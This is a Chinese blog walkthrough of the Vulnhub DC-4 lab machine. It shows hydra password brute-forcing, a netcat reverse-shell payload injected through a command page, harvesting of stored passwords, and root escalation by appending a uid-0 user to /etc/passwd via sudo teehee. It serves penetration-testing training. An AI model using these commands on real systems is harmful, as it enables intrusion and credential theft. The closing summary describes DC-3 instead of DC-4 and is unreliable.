免责声明
本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关。
前言
今日测试内容渗透dc-4靶机:
Vulnhub是一个提供各种漏洞环境的靶场平台,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞。本文将介绍**dc-4靶机渗透测试**,内容包括 nmap扫描、dirsearch、hydra密码爆破、Burp Suite密码爆破、netcat反弹shell、teehee提权等内容。
一、环境配置
渗透测试环境配置,请参考作者前面的内容,不再赘述:
靶机下载地址:https://download.vulnhub.com/dc/DC-4.zip
环境配置参照,vuInhub靶场实战系列-DC-2实战:https://editor.csdn.net/md/?articleId=139026849
二、信息收集
2.1 主机发现
┌──(root㉿kali)-[/home/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:b6:02:f0, IPv4: 192.168.6.66
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.6.1 00:50:56:c0:00:08 VMware, Inc.
192.168.6.2 00:50:56:f5:7b:9f VMware, Inc.
192.168.6.149 00:0c:29:69:33:da VMware, Inc.
192.168.6.254 00:50:56:fd:b7:3c VMware, Inc.
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.472 seconds (103.56 hosts/sec). 4 responded
排出自己kali攻击主机的ip,得到靶机的信息为:
IP地址为:192.168.6.149
MAC地址为:00:0c:29:69:33:da
2.2 端口扫描
┌──(root㉿kali)-[/home/kali]
└─# nmap -sC -sV -oA dc-3 192.168.6.149
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-21 10:43 EDT
Nmap scan report for 192.168.6.149
Host is up (0.0014s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
| 256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_ 256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp open http nginx 1.15.10
|_http-title: System Tools
|_http-server-header: nginx/1.15.10
MAC Address: 00:0C:29:69:33:DA (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.92 seconds
扫描结果显示为:22和80端口开放,
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
| 256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_ 256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp open http nginx 1.15.10
|_http-title: System Tools
|_http-server-header: nginx/1.15.10
2.3 指纹识别
┌──(root㉿kali)-[/home/kali]
└─# whatweb -v 192.168.6.149
WhatWeb report for http://192.168.6.149
Status : 200 OK
Title : System Tools
IP : 192.168.6.149
Country : RESERVED, ZZ
Summary : HTML5, HTTPServer[nginx/1.15.10], nginx[1.15.10], PasswordField[password]
Detected Plugins:
[ HTML5 ]
HTML version 5, detected by the doctype declaration
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
String : nginx/1.15.10 (from server string)
[ PasswordField ]
find password fields
String : password (from field name)
[ nginx ]
Nginx (Engine-X) is a free, open-source, high-performance
HTTP server and reverse proxy, as well as an IMAP/POP3
proxy server.
Version : 1.15.10
Website : http://nginx.net/
HTTP Headers:
HTTP/1.1 200 OK
Server: nginx/1.15.10
Date: Tue, 21 May 2024 14:46:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
得到关键信息:
Summary : HTML5, HTTPServer[nginx/1.15.10], nginx[1.15.10], PasswordField[password]
没有什么用o(╥﹏╥)o
2.4 目录扫描
┌──(root㉿kali)-[/home/kali]
└─# dirsearch -u 192.168.6.149 -e * -x 404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: 39772.zip | HTTP method: GET | Threads: 25 | Wordlist size: 9481
Output File: /home/kali/reports/_192.168.6.149/_24-05-21_10-59-10.txt
Target: http://192.168.6.149/
[10:59:10] Starting:
[10:59:41] 302 - 704B - /command.php -> index.php
[10:59:44] 301 - 170B - /css -> http://192.168.6.149/css/
[10:59:57] 301 - 170B - /images -> http://192.168.6.149/images/
[10:59:57] 403 - 556B - /images/
[10:59:58] 403 - 15B - /index.pHp
[11:00:04] 302 - 206B - /login.php -> index.php
Task Completed
扫描结果发现了command.php,也许后面测试会有用,先踩个眼 ^ _ ^
三、渗透测试
3.1 访问测试
浏览器访问如下地址:192.168.6.149
发现这是是一个登录页面,并且提示admin information systems login
相当于告诉我们:用户名是admin,猜密码是多少 ( * ^ ▽ ^ * )
3.2 hydra爆破
爆破密码也可以使用Burp Suite进行暴力破解,本文不讲述,有兴趣的读者可参考,作者本人上传《dc-4渗透测试流程图》暴力破解-方法2进行尝试暴力破解。
──(root㉿kali)-[/home/kali]
└─# hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.6.149 -vV http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" | grep http-post-form
[DATA] attacking http-post-form://192.168.6.149:80/login.php:username=^USER^&password=^PASS^:S=logout
[VERBOSE] Page redirected to http[s]://192.168.6.149:80/index.php
[VERBOSE] Page redirected to http[s]://192.168.6.149:80/index.php
.....
[VERBOSE] Page redirected to http[s]://192.168.6.149:80/index.php
[80][http-post-form] host: 192.168.6.149 login: admin password: happy
[VERBOSE] Page redirected to http[s]://192.168.6.149:80/index.php
[VERBOSE] Page redirected to http[s]://192.168.6.149:80/index.php
[VERBOSE] Page redirected to http[s]://192.168.6.149:80/index.php
[VERBOSE] Page redirected to http[s]://192.168.6.149:80/index.php
爆破成功:
login: admin password: happy
密码是happy,我还真的挺happy O(∩_∩)O哈哈~
3.3 尝试 登录
访问admin管理页尝试登录
发现有一个System Tools(Command命令),命令执行吗?
点击打卡command
可以看到提示You are currently logged in
猜测需要登录才能访问这个页面
可以执行的命令有:①-List Files(ls -l) ②-Disk Usage(du -h) ③-Disk Free(df -h)
3.4 反弹shell
3.4.1 kali监听4567端口
┌──(root?kali)-[/home/kali]
└─# nc -lvvp 4567
listening on [any] 4567 ...
3.4.2 Burp Suite执行payload
3.4.2.1 登录靶机
用户名:admin
密 码:happy
3.4.2.2 执行payload
payload:nc 192.168.6.66 4567 -e /bin/bash
3.4.2.3 反弹shell成功
└─# nc -lvvp 4567
listening on [any] 4567 ...
192.168.6.149: inverse host lookup failed: Host name lookup failure
connect to [192.168.6.66] from (UNKNOWN) [192.168.6.149] 34686
whoami
www-data
3.4.3 反弹交互shell
python -c 'import pty;pty.spawn("/bin/sh")'
输入上面命令之后,回车后,显示如下:
python -c 'import pty;pty.spawn("/bin/sh")'
$
3.4.4 发现密码
3.4.4.1 目录切换
$ cd /home
cd /home
$ ls
ls
charles jim sam
$ cd jim
cd jim
$ ls
ls
backups mbox test.sh
$ cd backups
cd backups
$ ls
ls
old-passwords.bak
$
3.4.4.2 查看密码文件
cat old-passwords.bak
3.4.4.3 生成ssh-pass.txt
可以复制打开的old-passwords.bak文件的内容,粘贴到ssh-pass.txt
3.5 提权
3.5.1 爆破ssh
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-4]
└─# hydra -l jim -P ssh-pass.txt -t 10 ssh://192.168.6.149
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-22 07:49:51
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 10 tasks per 1 server, overall 10 tasks, 252 login tries (l:1/p:252), ~26 tries per task
[DATA] attacking ssh://192.168.6.149:22/
[STATUS] 110.00 tries/min, 110 tries in 00:01h, 142 to do in 00:02h, 10 active
[STATUS] 80.00 tries/min, 160 tries in 00:02h, 92 to do in 00:02h, 10 active
[22][ssh] host: 192.168.6.149 login: jim password: jibril04
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-05-22 07:52:48
获得用户名和密码:
用户名:jim
密 码:jibril04
3.5.2 ssh连接
3.5.2.1 ssh登录
──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-4]
└─# ssh jim@192.168.6.149
jim@192.168.6.149's password:
Linux dc-4 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u5 (2017-09-19) i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have mail.
Last login: Sun Apr 7 02:23:55 2019 from 192.168.0.100
jim@dc-4:~$ ls
backups mbox test.sh
3.5.2.2 查看邮件
jim@dc-4:~$ cd /var/spool/mail
jim@dc-4:/var/spool/mail$ ls
jim
jim@dc-4:/var/spool/mail$ cat jim
邮件内容显示为:
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: charles@dc-4
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
(envelope-from charles@dc-4)
id 1hCjIX-0000kO-Qt
for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset=“UTF-8”
Content-Transfer-Encoding: 8bit
Message-Id: E1hCjIX-0000kO-Qt@dc-4
From: Charles charles@dc-4
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O
Hi Jim,
I’m heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.
Password is: ^xHhA&hvim0y
See ya,
Charles
Password is: ^xHhA&hvim0y
密码写邮件里,O(∩_∩)O哈哈~
3.5.3 切换charles用户
切换用户:
用户名:charles
密 码:^xHhA&hvim0y
jim@dc-4:/var/spool/mail$ su charles
Password:
charles@dc-4:/var/spool/mail$
切换用户成功。
3.5.4 sudo提权
3.5.4.1 发现可执行root程序
charles@dc-4:/var/spool/mail$ sudo -l
Matching Defaults entries for charles on dc-4:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User charles may run the following commands on dc-4:
(root) NOPASSWD: /usr/bin/teehee
发现以下命令可能可以运行:
/usr/bin/teehee
3.5.4.2 修改passwd文件
charles@dc-4:/var/spool/mail$ echo "test::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
test::0:0:::/bin/bash
修改passwd成功。
3.5.5 切换test(root)用户
charles@dc-4:/var/spool/mail$ su test
root@dc-4:/var/spool/mail#
切换用户以后,test用户自动拥有root权限
3.5.6 查看flag
root@dc-4:/var/spool/mail# find / -name *flag*
/usr/share/man/nl/man1/dpkg-buildflags.1.gz
/usr/share/man/de/man1/dpkg-buildflags.1.gz
/usr/share/man/man3/fesetexceptflag.3.gz
/usr/share/man/man3/fegetexceptflag.3.gz
/usr/share/man/man2/ioctl_iflags.2.gz
/usr/share/man/man1/dpkg-buildflags.1.gz
/usr/share/dpkg/buildflags.mk
/usr/include/linux/tty_flags.h
/usr/include/linux/kernel-page-flags.h
/usr/include/i386-linux-gnu/asm/processor-flags.h
/usr/include/i386-linux-gnu/bits/waitflags.h
/usr/bin/dpkg-buildflags
/usr/lib/i386-linux-gnu/perl/5.24.1/bits/waitflags.ph
/sys/kernel/debug/tracing/events/power/pm_qos_update_flags
/sys/devices/pci0000:00/0000:00:11.0/0000:02:01.0/net/eth0/flags
/sys/devices/platform/serial8250/tty/ttyS2/flags
/sys/devices/platform/serial8250/tty/ttyS0/flags
/sys/devices/platform/serial8250/tty/ttyS3/flags
/sys/devices/platform/serial8250/tty/ttyS1/flags
/sys/devices/system/cpu/cpu0/microcode/processor_flags
/sys/devices/virtual/net/lo/flags
/sys/module/scsi_mod/parameters/default_dev_flags
/root/flag.txt
/proc/sys/kernel/acpi_video_flags
/proc/kpageflags
root@dc-4:/var/spool/mail# cat /root/flag.txt
888 888 888 888 8888888b. 888 888 888 888
888 o 888 888 888 888 "Y88b 888 888 888 888
888 d8b 888 888 888 888 888 888 888 888 888
888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888
888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888
88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P
8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " "
888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888
Congratulations!!!
Hope you enjoyed DC-4. Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.
If you enjoyed this CTF, send me a tweet via @DCAU7.
渗透总结
在DC-3靶场渗透测试中,使用了nmap、whatweb、john、joomscan、SQLmap等工具进行渗透测试,使用nmap进行主机发现和端口扫描测试,使用joomscan扫描目录,使用whatweb信息网页信息搜集取到了关键信息,使用sqlmap进行数据库信息获取,最后进行了linux系统提权,并获得所有的flag,思路如下:
- 使用nmap进行主机发现和端口扫描
- 使用joomscan目录扫描
- 使用sqlmp进行sql注入获得用户信息
- 使用john进行密码爆破
- 登录管理页面上传shell脚本
- linux内核提权,并获得flag
参考文章
- DC-3环境:https://download.vulnhub.com/dc/DC-3-2.zip
- arp-scan使用:https://blog.csdn.net/newbeixue/article/details/123111543
- nmap详细使用教程:https://blog.csdn.net/smli_ng/article/details/105964486
- 黑客工具之whatweb详细使用教程:https://zhuanlan.zhihu.com/p/396345123
- dirsearch使用教程:https://blog.csdn.net/m0_48574718/article/details/129244162
- hydra使用手册:https://zhuanlan.zhihu.com/p/397779150
- 渗透测试工具Burp Suite详解:https://blog.csdn.net/Waffle666/article/details/111083913
- 黑客工具之Netcat详细使用教程:https://zhuanlan.zhihu.com/p/397058259
- teehee提权:https://www.cnblogs.com/zlgxzswjy/p/16118468.html
- dc-4渗透测试流程图
- ssh-pass.txt